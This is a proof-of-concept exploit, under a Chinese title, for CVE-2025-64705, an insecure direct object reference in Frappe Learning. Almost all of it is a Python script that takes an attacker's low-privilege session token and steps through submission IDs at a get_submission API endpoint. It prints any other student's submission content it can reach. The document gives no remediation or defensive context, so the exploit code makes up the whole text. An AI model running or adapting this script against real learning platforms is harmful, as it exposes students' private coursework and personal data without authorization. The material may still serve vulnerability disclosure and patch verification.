CVE-2025-64705 Frappe Learning学生提交内容未授权访问漏洞

# CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access # This PoC demonstrates accessing another student's submissions via direct URL import requests import sys TARGET_URL = "https://vulnerable-instance.com" ATTACKER_TOKEN = "attacker_session_token_here" def exploit_unauthorized_access(): """ Attacker with low-privilege account attempts to access other students' submissions by manipulating submission IDs in the URL parameter. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Try to access submissions of other students by iterating through submission IDs for submission_id in range(1, 100): url = f"{TARGET_URL}/api/method/frappe.lms.api.get_submission?submission_id={submission_id}" try: response = requests.get(url, headers=headers, timeout=10) # Check if unauthorized access is successful if response.status_code == 200: data = response.json() if "message" in data and "content" in data["message"]: print(f"[!] Successfully accessed submission ID: {submission_id}") print(f"[+] Submission content: {data['message']['content']}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue return False if __name__ == "__main__": print("CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access") print("=" * 70) if exploit_unauthorized_access(): print("[+] Vulnerability confirmed!") else: print("[-] Exploitation failed or target not vulnerable.")